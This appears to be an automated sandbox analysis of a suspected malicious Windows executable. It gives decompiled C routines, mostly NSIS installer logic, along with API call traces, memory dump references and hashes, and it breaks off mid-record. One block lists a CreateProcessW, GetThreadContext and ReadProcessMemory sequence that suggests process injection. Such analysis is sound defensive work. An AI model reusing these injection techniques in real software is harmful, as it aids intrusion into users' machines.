                                                                                    • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                    				signed int _t11;
                                                                                    				int _t14;
                                                                                    				signed int _t16;
                                                                                    				void* _t19;
                                                                                    				CHAR* _t20;
                                                                                    
                                                                                    				_t20 = _a4;
                                                                                    				_t19 = 0x64;
                                                                                    				while(1) {
                                                                                    					_t19 = _t19 - 1;
                                                                                    					_a4 = 0x61736e;
                                                                                    					_t11 = GetTickCount();
                                                                                    					_t16 = 0x1a;
                                                                                    					_a6 = _a6 + _t11 % _t16;
                                                                                    					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                                    					if(_t14 != 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					if(_t19 != 0) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					 *_t20 =  *_t20 & 0x00000000;
                                                                                    					return _t14;
                                                                                    				}
                                                                                    				return _t20;
                                                                                    			}








                                                                                    0x004058d1
                                                                                    0x004058d7
                                                                                    0x004058d8
                                                                                    0x004058d8
                                                                                    0x004058d9
                                                                                    0x004058e0
                                                                                    0x004058ea
                                                                                    0x004058f7
                                                                                    0x004058fa
                                                                                    0x00405902
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405906
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405908
                                                                                    0x00000000
                                                                                    0x00405908
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004058E0
                                                                                    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-4291775294
                                                                                    • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                    • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                                                                    • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                    • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 7379337D
                                                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 737933A0
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 737933C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThread
                                                                                    • String ID:
                                                                                    • API String ID: 2411489757-0
                                                                                    • Opcode ID: 9eb7263f1279a31e60d4b77e2190c73174968e986981d731f7414e9cd505bf28
                                                                                    • Instruction ID: 5d072fcec88909a47d0a5d9b5fbed6a588ddbf25d1a9e7db66067fcc9df9c3b4
                                                                                    • Opcode Fuzzy Hash: 9eb7263f1279a31e60d4b77e2190c73174968e986981d731f7414e9cd505bf28
                                                                                    • Instruction Fuzzy Hash: 77320731E40218EFFB61CBA4ED45BADB7B5AF08700F10459AE619FB2A0D7715A80DF19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 60%
                                                                                    			E00401F84(void* __ebx, void* __eflags) {
                                                                                    				struct HINSTANCE__* _t18;
                                                                                    				struct HINSTANCE__* _t26;
                                                                                    				void* _t27;
                                                                                    				struct HINSTANCE__* _t30;
                                                                                    				CHAR* _t32;
                                                                                    				intOrPtr* _t33;
                                                                                    				void* _t34;
                                                                                    
                                                                                    				_t27 = __ebx;
                                                                                    				asm("sbb eax, 0x42ecd8");
                                                                                    				 *(_t34 - 4) = 1;
                                                                                    				if(__eflags < 0) {
                                                                                    					_push(0xffffffe7);
                                                                                    					L15:
                                                                                    					E00401423();
                                                                                    					L16:
                                                                                    					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t32 = E00402A29(0xfffffff0);
                                                                                    				 *(_t34 + 8) = E00402A29(1);
                                                                                    				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                    					L3:
                                                                                    					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                    					_t30 = _t18;
                                                                                    					if(_t30 == _t27) {
                                                                                    						_push(0xfffffff6);
                                                                                    						goto L15;
                                                                                    					}
                                                                                    					L4:
                                                                                    					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                    					if(_t33 == _t27) {
                                                                                    						E00404EB3(0xfffffff7,  *(_t34 + 8));
                                                                                    					} else {
                                                                                    						 *(_t34 - 4) = _t27;
                                                                                    						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                    							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
                                                                                    						} else {
                                                                                    							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                    							if( *_t33() != 0) {
                                                                                    								 *(_t34 - 4) = 1;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
                                                                                    						FreeLibrary(_t30);
                                                                                    					}
                                                                                    					goto L16;
                                                                                    				}
                                                                                    				_t26 = GetModuleHandleA(_t32); // executed
                                                                                    				_t30 = _t26;
                                                                                    				if(_t30 != __ebx) {
                                                                                    					goto L4;
                                                                                    				}
                                                                                    				goto L3;
                                                                                    			}










                                                                                    0x00401f84
                                                                                    0x00401f84
                                                                                    0x00401f89
                                                                                    0x00401f90
                                                                                    0x0040204c
                                                                                    0x00402197
                                                                                    0x00402197
                                                                                    0x004028be
                                                                                    0x004028c1
                                                                                    0x004028cd
                                                                                    0x004028cd
                                                                                    0x00401f9f
                                                                                    0x00401fa9
                                                                                    0x00401fac
                                                                                    0x00401fbb
                                                                                    0x00401fbf
                                                                                    0x00401fc5
                                                                                    0x00401fc9
                                                                                    0x00402045
                                                                                    0x00000000
                                                                                    0x00402045
                                                                                    0x00401fcb
                                                                                    0x00401fd5
                                                                                    0x00401fd9
                                                                                    0x0040201d
                                                                                    0x00401fdb
                                                                                    0x00401fde
                                                                                    0x00401fe1
                                                                                    0x00402011
                                                                                    0x00401fe3
                                                                                    0x00401fe6
                                                                                    0x00401fef
                                                                                    0x00401ff1
                                                                                    0x00401ff1
                                                                                    0x00401fef
                                                                                    0x00401fe1
                                                                                    0x00402025
                                                                                    0x0040203a
                                                                                    0x0040203a
                                                                                    0x00000000
                                                                                    0x00402025
                                                                                    0x00401faf
                                                                                    0x00401fb5
                                                                                    0x00401fb9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                                                      • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                      • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                      • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041AF03,74B5EA30), ref: 00404F0F
                                                                                      • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 2987980305-0
                                                                                    • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                    • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                                                                                    • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                    • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 86%
                                                                                    			E004015B3(char __ebx, void* __eflags) {
                                                                                    				void* _t13;
                                                                                    				char _t21;
                                                                                    				void* _t22;
                                                                                    				char _t23;
                                                                                    				signed char _t24;
                                                                                    				char _t26;
                                                                                    				CHAR* _t28;
                                                                                    				char* _t32;
                                                                                    				void* _t33;
                                                                                    
                                                                                    				_t26 = __ebx;
                                                                                    				_t28 = E00402A29(0xfffffff0);
                                                                                    				_t13 = E0040574E(_t28);
                                                                                    				_t30 = _t13;
                                                                                    				if(_t13 != __ebx) {
                                                                                    					do {
                                                                                    						_t32 = E004056E5(_t30, 0x5c);
                                                                                    						_t21 =  *_t32;
                                                                                    						 *_t32 = _t26;
                                                                                    						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                    						if(_t21 != _t26) {
                                                                                    							L5:
                                                                                    							_t22 = E004053F2(_t28);
                                                                                    						} else {
                                                                                    							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                    							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
                                                                                    								goto L5;
                                                                                    							} else {
                                                                                    								_t22 = E00405375(_t28); // executed
                                                                                    							}
                                                                                    						}
                                                                                    						if(_t22 != _t26) {
                                                                                    							if(_t22 != 0xb7) {
                                                                                    								L9:
                                                                                    								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                    							} else {
                                                                                    								_t24 = GetFileAttributesA(_t28); // executed
                                                                                    								if((_t24 & 0x00000010) == 0) {
                                                                                    									goto L9;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                    						 *_t32 = _t23;
                                                                                    						_t30 = _t32 + 1;
                                                                                    					} while (_t23 != _t26);
                                                                                    				}
                                                                                    				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                    					_push(0xfffffff5);
                                                                                    					E00401423();
                                                                                    				} else {
                                                                                    					E00401423(0xffffffe6);
                                                                                    					E00405BC7(0x434800, _t28);
                                                                                    					if(SetCurrentDirectoryA(_t28) == 0) {
                                                                                    						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                    					}
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
                                                                                    				return 0;
                                                                                    			}












                                                                                    0x004015b3
                                                                                    0x004015ba
                                                                                    0x004015bd
                                                                                    0x004015c2
                                                                                    0x004015c6
                                                                                    0x004015c8
                                                                                    0x004015d0
                                                                                    0x004015d2
                                                                                    0x004015d4
                                                                                    0x004015d8
                                                                                    0x004015db
                                                                                    0x004015f3
                                                                                    0x004015f4
                                                                                    0x004015dd
                                                                                    0x004015dd
                                                                                    0x004015e0
                                                                                    0x00000000
                                                                                    0x004015eb
                                                                                    0x004015ec
                                                                                    0x004015ec
                                                                                    0x004015e0
                                                                                    0x004015fb
                                                                                    0x00401602
                                                                                    0x0040160f
                                                                                    0x0040160f
                                                                                    0x00401604
                                                                                    0x00401605
                                                                                    0x0040160d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040160d
                                                                                    0x00401602
                                                                                    0x00401612
                                                                                    0x00401615
                                                                                    0x00401617
                                                                                    0x00401618
                                                                                    0x004015c8
                                                                                    0x0040161f
                                                                                    0x0040164a
                                                                                    0x00402197
                                                                                    0x00401621
                                                                                    0x00401623
                                                                                    0x0040162e
                                                                                    0x0040163c
                                                                                    0x00401642
                                                                                    0x00401642
                                                                                    0x0040163c
                                                                                    0x004028c1
                                                                                    0x004028cd

                                                                                    APIs
                                                                                      • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                                                      • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                                                      • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                      • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,00434800,00000000,00000000,000000F0), ref: 00401634
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                    • String ID:
                                                                                    • API String ID: 1892508949-0
                                                                                    • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                                                    • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                                                                                    • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                                                    • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 69%
                                                                                    			E00401389(signed int _a4) {
                                                                                    				intOrPtr* _t6;
                                                                                    				void* _t8;
                                                                                    				void* _t10;
                                                                                    				signed int _t11;
                                                                                    				void* _t12;
                                                                                    				signed int _t16;
                                                                                    				signed int _t17;
                                                                                    				void* _t18;
                                                                                    
                                                                                    				_t17 = _a4;
                                                                                    				while(_t17 >= 0) {
                                                                                    					_t6 = _t17 * 0x1c +  *0x42ec50;
                                                                                    					if( *_t6 == 1) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_push(_t6); // executed
                                                                                    					_t8 = E00401434(); // executed
                                                                                    					if(_t8 == 0x7fffffff) {
                                                                                    						return 0x7fffffff;
                                                                                    					}
                                                                                    					_t10 = E0040136D(_t8);
                                                                                    					if(_t10 != 0) {
                                                                                    						_t11 = _t10 - 1;
                                                                                    						_t16 = _t17;
                                                                                    						_t17 = _t11;
                                                                                    						_t12 = _t11 - _t16;
                                                                                    					} else {
                                                                                    						_t12 = _t10 + 1;
                                                                                    						_t17 = _t17 + 1;
                                                                                    					}
                                                                                    					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                    						 *0x42e40c =  *0x42e40c + _t12;
                                                                                    						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
                                                                                    					}
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}











                                                                                    0x0040138a
                                                                                    0x004013fa
                                                                                    0x0040139b
                                                                                    0x004013a0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004013a2
                                                                                    0x004013a3
                                                                                    0x004013ad
                                                                                    0x00000000
                                                                                    0x00401404
                                                                                    0x004013b0
                                                                                    0x004013b7
                                                                                    0x004013bd
                                                                                    0x004013be
                                                                                    0x004013c0
                                                                                    0x004013c2
                                                                                    0x004013b9
                                                                                    0x004013b9
                                                                                    0x004013ba
                                                                                    0x004013ba
                                                                                    0x004013c9
                                                                                    0x004013cb
                                                                                    0x004013f4
                                                                                    0x004013f4
                                                                                    0x004013c9
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                    • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                                                                                    • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                    • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405F57(signed int _a4) {
                                                                                    				struct HINSTANCE__* _t5;
                                                                                    				signed int _t10;
                                                                                    
                                                                                    				_t10 = _a4 << 3;
                                                                                    				_t8 =  *(_t10 + 0x409208);
                                                                                    				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
                                                                                    				if(_t5 != 0) {
                                                                                    					L2:
                                                                                    					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
                                                                                    				}
                                                                                    				_t5 = E00405EE9(_t8); // executed
                                                                                    				if(_t5 == 0) {
                                                                                    					return 0;
                                                                                    				}
                                                                                    				goto L2;
                                                                                    			}





                                                                                    0x00405f5f
                                                                                    0x00405f62
                                                                                    0x00405f69
                                                                                    0x00405f71
                                                                                    0x00405f7d
                                                                                    0x00000000
                                                                                    0x00405f84
                                                                                    0x00405f74
                                                                                    0x00405f7b
                                                                                    0x00000000
                                                                                    0x00405f8c
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                      • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                                                      • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                                                                      • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                    • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                                                                                    • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                    • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 68%
                                                                                    			E0040589E(CHAR* _a4, long _a8, long _a12) {
                                                                                    				signed int _t5;
                                                                                    				void* _t6;
                                                                                    
                                                                                    				_t5 = GetFileAttributesA(_a4); // executed
                                                                                    				asm("sbb ecx, ecx");
                                                                                    				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                    				return _t6;
                                                                                    			}





                                                                                    0x004058a2
                                                                                    0x004058af
                                                                                    0x004058c4
                                                                                    0x004058ca

                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\Nz7NA3F7z7.exe,80000000,00000003), ref: 004058A2
                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                    • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                                    • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                    • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004053F2(CHAR* _a4) {
                                                                                    				int _t2;
                                                                                    
                                                                                    				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                    				if(_t2 == 0) {
                                                                                    					return GetLastError();
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}




                                                                                    0x004053f8
                                                                                    0x00405400
                                                                                    0x00000000
                                                                                    0x00405406
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                                                                    • GetLastError.KERNEL32 ref: 00405406
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                    • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                                                                                    • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                    • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004030B0(void* _a4, long _a8) {
                                                                                    				int _t6;
                                                                                    				long _t10;
                                                                                    
                                                                                    				_t10 = _a8;
                                                                                    				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                                                                    				if(_t6 == 0 || _a8 != _t10) {
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					return 1;
                                                                                    				}
                                                                                    			}





                                                                                    0x004030b4
                                                                                    0x004030c7
                                                                                    0x004030cf
                                                                                    0x00000000
                                                                                    0x004030d6
                                                                                    0x00000000
                                                                                    0x004030d8

                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
